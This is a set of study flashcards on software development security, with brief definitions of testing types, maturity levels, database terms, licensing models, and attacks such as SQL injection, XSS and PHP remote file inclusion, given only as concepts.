Software Dev Sec Flashcards
ORB
Object request broker: used to locate object; object search engines; middleware; include COM, DCOM, CORBA
Defined
s/w process for both mgt and engineering activites id socumented, standardized and integrated into standard s/w process for org
genetic programming
seeks to replicate nature’s evolution; creates random programs and assigns them a task of solving a problem
4 s/w freedoms
freedom to 1. use the s/w for any purpose 2. change the s/w to suit your needs 3. share the s/w w/ friends and neighbors 4. share the changes you make
compilers
take source code, such as C or basic and compile it into machine code
PHP RFI
PHP Remote file inclusion: altering normal PHP URLs and variables to include and execute remote content
optimized
continual process improvement is enabled by quantitative feedback from the process and from piloting innovative ideas and technologies
repeatable
basic proj mgt process are establishe to track cost, schedule, and funtionality; necessary process discipline is in place to repeat earlier successes on similar projects
ANN
artificial neural networks: expert system that simulates neural networks found in humans and animals; seek to duplicate biological neural networks; leanrs by example via training
types of CASE software
- tools: support onlyl specific tasks in s/w production process 2. workbenches: support 1 or a few s/w process activities by integrating several tools in a single application 3. environments: support all or at least part of the s/w production process w/collection of tools and workbenches
bayesian filtering
commonly used to ID spam
Agile Manifesto values
- individuals and interactions over process and tools 2 working s/w over comprehensive doc 3. customer collaboration over contract negotiation 4. responding to change over following a plan
scrum
named for way Rugby is played. No baton race in track, instead whole team works to move the project by passing ball back and forth as needed
datawarehouse
large collection of data
COM
component object model: ORB that locates objects on a local system
SQL injection
manipulation of a back end SQL server via a front end web server
s/w testing levels
unit, installation, integration, regression, acceptance
white box s/w testing
gives the tester access to program source code, data structures, variables, etc
XSS
cross site scripting: leverages third-party execution of web scripting languages such as javascript within the security context of a trusted site
source code
computer programming language instructions that are written in text that must be translated into machine code before execution by the CPU
open source
software publishes source code publicly
expert systems
- knowledge base of if/then statements 2. inference engine that follows the tree formed by knowledge base and fires a rule when there is a match
traceability matrix
used to map customer’s req’ts to s/w testing plan
primary key
unique value in each tuple in a table
black box testing
gives test no internal details
dynamic testing
tests the code while executing it
installation testing
testing s/w as it is installed and first operated
4GL
fourth generation language: computer languages designed to increase programmer’s efficiency by automating creation of computer code; GUI focused; focus on creation of databases, reports, websites
closed source
software is typically released in executable form
average # mistakes in computer code
10-50 mistakes per 1000 lines of code
database replication
mirrors a live database, allowing simultaneous reads and writes to multiple replicated databases by clients
relational database
contains 2-dimensional tables of related data
privilege escalation
allow an attacker with (typically limited) access to be able to access additional resources
shareware
fully functional proprietary s/w that may be initially used free, but requires you to pay if you continue to use it
normalization
seeks to make the data in a database table logically concise, organized, and consistent.
interpreted languages
compiled on the fly each time the program is run
integration testing
testing multiple s/w components as they are combined into a working system; subsets may be tested, or big bang integration testing tests all integrated s/w components
entity integrity
each tuple has a unique primary key that is not null
crippleware
partially functioning proprietary s/w, often with key features disabled; must pay to get the full bologna